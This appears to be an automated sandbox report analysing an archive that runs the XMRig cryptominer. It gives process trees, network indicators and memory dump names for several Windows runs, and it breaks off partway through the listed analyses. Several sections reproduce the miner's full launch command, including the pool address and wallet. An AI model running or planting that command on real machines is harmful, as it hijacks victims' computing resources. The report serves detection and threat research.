Malware Analysis Report

2025-08-10 14:49

Sample ID: 241026-b6pkhsvpan
Target: PUB.rar
SHA256: 5b06e18380c2c8261419a482e5d54b189bbe9b0feaccd355c3cb1bc4aaedd017
Tags: miner xmrig
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
Analysis: static1 (Detonation Overview, Signatures)

Behavioral analyses, each with the subsections Detonation Overview, Command Line, Signatures, Processes, Network, Files:

Analysis: behavioral15
Analysis: behavioral19
Analysis: behavioral21
Analysis: behavioral22
Analysis: behavioral24
Analysis: behavioral7
Analysis: behavioral10
Analysis: behavioral16
Analysis: behavioral1
Analysis: behavioral4
Analysis: behavioral6
Analysis: behavioral12
Analysis: behavioral20
Analysis: behavioral2
Analysis: behavioral5
Analysis: behavioral8
Analysis: behavioral11
Analysis: behavioral13
Analysis: behavioral17
Analysis: behavioral18
Analysis: behavioral23
Analysis: behavioral3
Analysis: behavioral9
Analysis: behavioral14

Analysis Overview

Score: 10/10
SHA256: 5b06e18380c2c8261419a482e5d54b189bbe9b0feaccd355c3cb1bc4aaedd017
Threat Level: Known bad

The file PUB.rar was found to be: Known bad.

Malicious Activity Summary

miner xmrig

XMRig Miner payload

Xmrig family

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported: 2024-10-26 01:45

Signatures

XMRig Miner payload
Tag: miner

Description | Indicator | Process | Target
N/A         | N/A       | N/A     | N/A
N/A         | N/A       | N/A     | N/A

Xmrig family
Tag: xmrig

Unsigned PE

Description | Indicator | Process | Target
N/A         | N/A       | N/A     | N/A

Analysis: behavioral15

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 300s
Max time network: 304s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                     | Indicator | Process                     | Target
PID 220 wrote to memory of 2700 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 220 wrote to memory of 2700 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | 8.8.8.8.in-addr.arpa         | udp
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.244.104:5332 | us-zephyr.miningocean.org    | tcp
US      | 8.8.8.8:53          | 20.160.190.20.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 79.190.18.2.in-addr.arpa     | udp
US      | 8.8.8.8:53          | 95.221.229.192.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 104.244.204.15.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 53.210.109.20.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 18.31.95.13.in-addr.arpa     | udp
US      | 8.8.8.8:53          | 107.209.201.84.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 99.209.201.84.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 14.227.111.52.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 168.117.168.52.in-addr.arpa  | udp
US      | 8.8.8.8:53          | fd.api.iris.microsoft.com    | udp
FR      | 20.74.47.205:443    | fd.api.iris.microsoft.com    | tcp

Files

memory/2700-0-0x0000020D0C470000-0x0000020D0C490000-memory.dmp

memory/2700-1-0x0000020D9E610000-0x0000020D9E630000-memory.dmp

memory/2700-2-0x0000020D9EA50000-0x0000020D9EA70000-memory.dmp

memory/2700-3-0x0000020D9EC80000-0x0000020D9ECA0000-memory.dmp

memory/2700-5-0x0000020D9EC80000-0x0000020D9ECA0000-memory.dmp

memory/2700-4-0x0000020D9EA50000-0x0000020D9EA70000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 300s
Max time network: 284s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 1028 wrote to memory of 3592 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 1028 wrote to memory of 3592 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.244.104:5332 | us-zephyr.miningocean.org    | tcp
US      | 8.8.8.8:53          | 95.221.229.192.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 138.32.126.40.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 104.244.204.15.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 200.163.202.172.in-addr.arpa | udp
US      | 8.8.8.8:53          | 70.209.201.84.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 241.42.69.40.in-addr.arpa    | udp
US      | 8.8.8.8:53          | 72.209.201.84.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 240.221.184.93.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 29.243.111.52.in-addr.arpa   | udp

Files

memory/3592-0-0x000002075F3D0000-0x000002075F3F0000-memory.dmp

memory/3592-1-0x000002075F420000-0x000002075F440000-memory.dmp

memory/3592-3-0x000002075F440000-0x000002075F460000-memory.dmp

memory/3592-2-0x000002075F460000-0x000002075F480000-memory.dmp

memory/3592-5-0x000002075F440000-0x000002075F460000-memory.dmp

memory/3592-4-0x000002075F460000-0x000002075F480000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 155s
Max time network: 282s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 3276 wrote to memory of 1344 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3276 wrote to memory of 1344 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.240.197:5332 | us-zephyr.miningocean.org    | tcp
US      | 8.8.8.8:53          | 8.8.8.8.in-addr.arpa         | udp
US      | 8.8.8.8:53          | 197.240.204.15.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 20.160.190.20.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 79.190.18.2.in-addr.arpa     | udp
US      | 8.8.8.8:53          | 95.221.229.192.in-addr.arpa  | udp
US      | 8.8.8.8:53          | fd.api.iris.microsoft.com    | udp
IE      | 20.223.36.55:443    | fd.api.iris.microsoft.com    | tcp
US      | 8.8.8.8:53          | 200.163.202.172.in-addr.arpa | udp
US      | 8.8.8.8:53          | 241.42.69.40.in-addr.arpa    | udp
US      | 8.8.8.8:53          | 55.36.223.20.in-addr.arpa    | udp
US      | 8.8.8.8:53          | 172.214.232.199.in-addr.arpa | udp
US      | 8.8.8.8:53          | 14.227.111.52.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 27.173.189.20.in-addr.arpa   | udp

Files

memory/1344-0-0x00000168B3EB0000-0x00000168B3ED0000-memory.dmp

memory/1344-1-0x00000168B4010000-0x00000168B4030000-memory.dmp

memory/1344-3-0x00000168B4030000-0x00000168B4050000-memory.dmp

memory/1344-2-0x00000169466D0000-0x00000169466F0000-memory.dmp

memory/1344-5-0x00000168B4030000-0x00000168B4050000-memory.dmp

memory/1344-4-0x00000169466D0000-0x00000169466F0000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241023-en
Max time kernel: 91s
Max time network: 311s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 2232 wrote to memory of 1520 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2232 wrote to memory of 1520 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.240.197:5332 | us-zephyr.miningocean.org    | tcp
US      | 8.8.8.8:53          | 8.8.8.8.in-addr.arpa         | udp

Files

memory/1520-0-0x000001C52AD20000-0x000001C52AD40000-memory.dmp

memory/1520-1-0x000001C52AD70000-0x000001C52AD90000-memory.dmp

memory/1520-2-0x000001C52AD90000-0x000001C52ADB0000-memory.dmp

memory/1520-3-0x000001C52ADB0000-0x000001C52ADD0000-memory.dmp

memory/1520-4-0x000001C52AD90000-0x000001C52ADB0000-memory.dmp

memory/1520-5-0x000001C52ADB0000-0x000001C52ADD0000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 147s
Max time network: 280s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 1280 wrote to memory of 2912 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 1280 wrote to memory of 2912 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.244.104:5332 | us-zephyr.miningocean.org    | tcp
US      | 8.8.8.8:53          | 8.8.8.8.in-addr.arpa         | udp
US      | 8.8.8.8:53          | 104.244.204.15.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 77.190.18.2.in-addr.arpa     | udp
US      | 150.171.28.10:443   | tse1.mm.bing.net             | tcp

Files

memory/2912-0-0x00000280DEB50000-0x00000280DEB70000-memory.dmp

memory/2912-1-0x00000280DEBB0000-0x00000280DEBD0000-memory.dmp

memory/2912-3-0x00000280DEBF0000-0x00000280DEC10000-memory.dmp

memory/2912-2-0x00000280DEBD0000-0x00000280DEBF0000-memory.dmp

memory/2912-4-0x00000280DEBD0000-0x00000280DEBF0000-memory.dmp

memory/2912-5-0x00000280DEBF0000-0x00000280DEC10000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 300s
Max time network: 280s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                     | Indicator | Process                     | Target
PID 2296 wrote to memory of 668 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2296 wrote to memory of 668 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.240.197:5332 | us-zephyr.miningocean.org    | tcp
US      | 8.8.8.8:53          | 8.8.8.8.in-addr.arpa         | udp
US      | 8.8.8.8:53          | 64.159.190.20.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 71.209.201.84.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 197.240.204.15.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 200.163.202.172.in-addr.arpa | udp
US      | 8.8.8.8:53          | 241.42.69.40.in-addr.arpa    | udp
US      | 8.8.8.8:53          | 172.214.232.199.in-addr.arpa | udp
US      | 8.8.8.8:53          | 77.190.18.2.in-addr.arpa     | udp
US      | 8.8.8.8:53          | 31.243.111.52.in-addr.arpa   | udp

Files

memory/668-0-0x000001F5473F0000-0x000001F547410000-memory.dmp

memory/668-1-0x000001F548D60000-0x000001F548D80000-memory.dmp

memory/668-2-0x000001F548DA0000-0x000001F548DC0000-memory.dmp

memory/668-3-0x000001F548D80000-0x000001F548DA0000-memory.dmp

memory/668-5-0x000001F548D80000-0x000001F548DA0000-memory.dmp

memory/668-4-0x000001F548DA0000-0x000001F548DC0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 147s
Max time network: 282s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                     | Indicator | Process                     | Target
PID 3552 wrote to memory of 388 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3552 wrote to memory of 388 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.240.197:5332 | us-zephyr.miningocean.org    | tcp

Files

memory/388-0-0x000001EF1EE90000-0x000001EF1EEB0000-memory.dmp

memory/388-1-0x000001EF1EEE0000-0x000001EF1EF00000-memory.dmp

memory/388-3-0x000001EF1EF20000-0x000001EF1EF40000-memory.dmp

memory/388-2-0x000001EF1EF00000-0x000001EF1EF20000-memory.dmp

memory/388-4-0x000001EF1EF00000-0x000001EF1EF20000-memory.dmp

memory/388-5-0x000001EF1EF20000-0x000001EF1EF40000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 91s
Max time network: 269s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 2516 wrote to memory of 4116 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2516 wrote to memory of 4116 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.240.197:5332 | us-zephyr.miningocean.org    | tcp

Files

memory/4116-0-0x000002099DF30000-0x000002099DF50000-memory.dmp

memory/4116-1-0x000002099DF80000-0x000002099DFA0000-memory.dmp

memory/4116-3-0x000002099DFA0000-0x000002099DFC0000-memory.dmp

memory/4116-2-0x000002099DFC0000-0x000002099DFE0000-memory.dmp

memory/4116-5-0x000002099DFA0000-0x000002099DFC0000-memory.dmp

memory/4116-4-0x000002099DFC0000-0x000002099DFE0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 154s
Max time network: 280s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys
    C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | 75.159.190.20.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 95.221.229.192.in-addr.arpa  | udp
US      | 8.8.8.8:53          | fd.api.iris.microsoft.com    | udp
IE      | 20.223.35.26:443    | fd.api.iris.microsoft.com    | tcp
US      | 8.8.8.8:53          | 53.210.109.20.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 26.35.223.20.in-addr.arpa    | udp
US      | 8.8.8.8:53          | 172.210.232.199.in-addr.arpa | udp
US      | 8.8.8.8:53          | 241.42.69.40.in-addr.arpa    | udp
US      | 8.8.8.8:53          | 240.221.184.93.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 29.243.111.52.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 28.173.189.20.in-addr.arpa   | udp

Files

memory/1144-0-0x0000000000010000-0x0000000000017000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 300s
Max time network: 203s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    "C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | 8.8.8.8.in-addr.arpa         | udp
N/A     | 13.89.179.10:443    |                              | tcp

Files

memory/1056-0-0x0000026771D80000-0x0000026771DA0000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 212s
Max time network: 283s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 4100 wrote to memory of 3168 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 4100 wrote to memory of 3168 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.244.104:5332 | us-zephyr.miningocean.org    | tcp

Files

memory/3168-0-0x00000209C94F0000-0x00000209C9510000-memory.dmp

memory/3168-1-0x00000209CAFB0000-0x00000209CAFD0000-memory.dmp

memory/3168-3-0x00000209CB010000-0x00000209CB030000-memory.dmp

memory/3168-2-0x00000209CAFF0000-0x00000209CB010000-memory.dmp

memory/3168-5-0x00000209CB010000-0x00000209CB030000-memory.dmp

memory/3168-4-0x00000209CAFF0000-0x00000209CB010000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 299s
Max time network: 303s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 3548 wrote to memory of 3684 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3548 wrote to memory of 3684 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.244.104:5332 | us-zephyr.miningocean.org    | tcp

Files

memory/3684-0-0x00000234ADC50000-0x00000234ADC70000-memory.dmp

memory/3684-1-0x00000234AF540000-0x00000234AF560000-memory.dmp

